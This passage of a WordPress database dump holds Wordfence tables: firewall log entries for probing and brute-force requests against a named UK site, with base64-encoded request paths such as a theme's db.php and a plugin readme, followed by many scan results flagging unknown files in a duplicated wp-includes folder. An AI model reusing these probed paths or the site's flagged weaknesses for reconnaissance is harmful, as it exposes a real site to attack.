User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Nlb3RoZW1lL2RiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(12642,1675200308.131732,1675200307.991500,'\0\0\0\0\0\0\0\0\0\0��m���',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/js-support-ticket/readme.txt',NULL,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9qcy1zdXBwb3J0LXRpY2tldC9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9qcy1zdXBwb3J0LXRpY2tldC9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(12643,1675200308.131614,1675200307.991500,'\0\0\0\0\0\0\0\0\0\0��m���',0,200,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/js-support-ticket/readme.txt',NULL,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9qcy1zdXBwb3J0LXRpY2tldC9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9qcy1zdXBwb3J0LXRpY2tldC9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}');
/*!40000 ALTER TABLE `wp_wfhits` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfhoover`
--

DROP TABLE IF EXISTS `wp_wfhoover`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfhoover` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `owner` text DEFAULT NULL,
  `host` text DEFAULT NULL,
  `path` text DEFAULT NULL,
  `hostKey` varbinary(124) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k2` (`hostKey`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfhoover`
--

LOCK TABLES `wp_wfhoover` WRITE;
/*!40000 ALTER TABLE `wp_wfhoover` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfhoover` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfissues`
--

DROP TABLE IF EXISTS `wp_wfissues`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfissues` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `time` int(10) unsigned NOT NULL,
  `lastUpdated` int(10) unsigned NOT NULL,
  `status` varchar(10) NOT NULL,
  `type` varchar(20) NOT NULL,
  `severity` tinyint(3) unsigned NOT NULL,
  `ignoreP` char(32) NOT NULL,
  `ignoreC` char(32) NOT NULL,
  `shortMsg` varchar(255) NOT NULL,
  `longMsg` text DEFAULT NULL,
  `data` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `lastUpdated` (`lastUpdated`),
  KEY `status` (`status`),
  KEY `ignoreP` (`ignoreP`),
  KEY `ignoreC` (`ignoreC`)
) ENGINE=InnoDB AUTO_INCREMENT=78184 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfissues`
--

LOCK TABLES `wp_wfissues` WRITE;
/*!40000 ALTER TABLE `wp_wfissues` DISABLE KEYS */;
INSERT INTO `wp_wfissues` VALUES (77160,1675048809,1675048809,'new','knownfile',75,'d6c6ef1c4bd0d17915c64b2a6c80881b','b1e5b9cb3c257803cf24f1bb1b510d2f','Unknown file in WordPress core: wp-includes/wp-includes/class-walker-category-dropdown.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/class-walker-category-dropdown.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77161,1675048809,1675048809,'new','knownfile',75,'d4b7f1fa824009091ca88bc8431c2d5d','ad86a6adfb0bc120ba27e5f25d531ae6','Unknown file in WordPress core: wp-includes/wp-includes/class-walker-category.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/class-walker-category.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77162,1675048809,1675048809,'new','knownfile',75,'f8db36cf1f202c253cbe365909099ac7','fb0f69e631665e40c09f1bdde5a9a935','Unknown file in WordPress core: wp-includes/wp-includes/class-walker-comment.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/class-walker-comment.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77163,1675048809,1675048809,'new','knownfile',75,'27bdf3c39551e4629005fc2c701d109f','a59e8b23af4705ad231f00defd5b915d','Unknown file in WordPress core: wp-includes/wp-includes/class-walker-nav-menu.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/class-walker-nav-menu.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77164,1675048809,1675048809,'new','knownfile',75,'b37a26840312e3b3c18763705f4da3a7','2b8db5b1d57ac84b8b75e8609cbfeeae','Unknown file in WordPress core: wp-includes/wp-includes/class-walker-page-dropdown.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/class-walker-page-dropdown.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77165,1675048810,1675048810,'new','knownfile',75,'746c77ca0faf6e1e2e4c12d894cdc8ad','3b486dc00b88b8ec3fac499e4516424f','Unknown file in WordPress core: wp-includes/wp-includes/class-walker-page.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/class-walker-page.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77166,1675048810,1675048810,'new','knownfile',75,'2e66d497e28bc4b0949a77ad9ce109ec','094570aaf6eb960edd131dc70b79b86e','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-admin-bar.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/class-wp-admin-bar.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77167,1675048810,1675048810,'new','knownfile',75,'0e91757e0c8d50dbed226906331b98e1','29e22428322f9cd0bb8c194b0351691d','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-ajax-response.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/class-wp-ajax-response.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77168,1675048810,1675048810,'new','knownfile',75,'b419f3f1318db6a80831aac6c974b215','e309e209bd6b1f00fccc9b9dff421520','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-application-passwords.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/class-wp-application-passwords.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77169,1675048810,1675048810,'new','knownfile',75,'4d6e056decb678c880adaf6e19bd130d','d0a4707b76d96df4f3b9eb174f3088af','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-block-list.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/class-wp-block-list.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77170,1675048811,1675048811,'new','knownfile',75,'b39d4d31c4ffcfffcc9c187b8d4e2aba','eb25f4a3edc34be447a1c473b875b321','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-block-parser.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/class-wp-block-parser.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77171,1675048811,1675048811,'new','knownfile',75,'4857d6d22db5da4f85db2310cdea4e73','5cd8df20639b43ec92f1a34123bbb510','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-block-pattern-categories-registry.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/class-wp-block-pattern-categories-registry.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77172,1675048811,1675048811,'new','knownfile',75,'63b4fdc561efbc182162fe8e2b020aab','7144703c890fd4c618e9f4e23180c591','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-block-patterns-registry.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/class-wp-block-patterns-registry.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77173,1675048811,1675048811,'new','knownfile',75,'ade974a0a2103f178a12ef0a654048e4','b0aa9aed7abbeda7ea5edf74c8d90788','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-block-styles-registry.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/class-wp-block-styles-registry.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77174,1675048811,1675048811,'new','knownfile',75,'16ed280bccc089646b4a4f6c198c0970','f8fc843391244be220571df84d75f481','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-block-supports.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/class-wp-block-supports.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77175,1675048811,1675048811,'new','knownfile',75,'9c6facbb93c52f153044d18bef362cb1','ea24885244c80276daff4fc01d490e2e','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-block-type-registry.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/class-wp-block-type-registry.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77176,1675048811,1675048811,'new','knownfile',75,'0c6107804b14cca9822b46ad36b4634a','3b2cf90046407269d9b6f8cfcb51c435','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-block-type.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/class-wp-block-type.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77177,1675048811,1675048811,'new','knownfile',75,'bd92a448e9404a9397d668d648aa7357','427354ac098e637a83f05a7f703bfa34','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-block.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/class-wp-block.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77178,1675048811,1675048811,'new','knownfile',75,'1c50c5939344b30338ffa100a1340f28','a9787116e569d78a697c4fa35a57be9d','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-comment-query.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/class-wp-comment-query.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77179,1675048811,1675048811,'new','knownfile',75,'f1be47743efe763230feb8fb24d89578','96bd68c4225b9e6db05cc4536c71381d','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-comment.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/class-wp-comment.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77180,1675048811,1675048811,'new','knownfile',75,'978c04844b2990d21e9a400ef63d0a0e','2b54342d192304c492f461ccc788ff26','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-customize-control.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/class-wp-customize-control.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77181,1675048811,1675048811,'new','knownfile',75,'7874856bba1f7bdad0f7f86ee68f7776','af66a295159e2423772f9db7da5b7e13','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-customize-manager.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/class-wp-customize-manager.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77182,1675048811,1675048811,'new','knownfile',75,'2eda7305fa7f7fb50c594d00ba29750c','7a23e83c13c40fa1a0d82e699b27162d','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-customize-nav-menus.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/class-wp-customize-nav-menus.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77183,1675048811,1675048811,'new','knownfile',75,'a3add13a7db6f378a66ff76b7d122fdf','c68b0f65511508eaa726d2bad5262039','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-customize-panel.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/class-wp-customize-panel.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77184,1675048811,1675048811,'new','knownfile',75,'061b96cdbbde410198bb2cbd13b63efd','c39d3a9cf4f752cbb10632e63640f062','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-customize-section.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/class-wp-customize-section.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77185,1675048811,1675048811,'new','knownfile',75,'d49e46fd12a0d78f679326b6e0668b15','5126d47178bb6189211ddac19f898205','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-customize-setting.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/class-wp-customize-setting.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77186,1675048811,1675048811,'new','knownfile',75,'aab4dcd5dd041c7af4e24951ea7430db','b51152a67f77fa5958a8c0e8bddd10fd','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-customize-widgets.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/class-wp-customize-widgets.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77187,1675048811,1675048811,'new','knownfile',75,'db5f38cbc1f2c2e2c40da422fce72526','4c4965aafc20c71bf88136dd4349b589','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-date-query.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/class-wp-date-query.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77188,1675048812,1675048812,'new','knownfile',75,'bec8fd7c6aae72a3aa35ad587eaf002e','bbf363e9f0b25bdb36d333bd3e7b8af1','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-dependency.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/class-wp-dependency.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77189,1675048812,1675048812,'new','knownfile',75,'2b206fbdf7ff7823b95252b729bd2ebf','f35e0ef82702c264989ba8c18478651e','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-editor.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/class-wp-editor.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77190,1675048812,1675048812,'new','knownfile',75,'41e71671882c9581af1399d1ed8dd860','eb3e06397f43378e6b0e430bbf989723','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-embed.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/class-wp-embed.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(77191,1675048812,1675048812,'new','knownfile',75,'3d48380350d884d197234943fd3c3ee5','3443b8e777c11396ddd743efe9a41d29','Unknown file in WordPress core: wp-includes/wp-includes/class-wp-error.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new 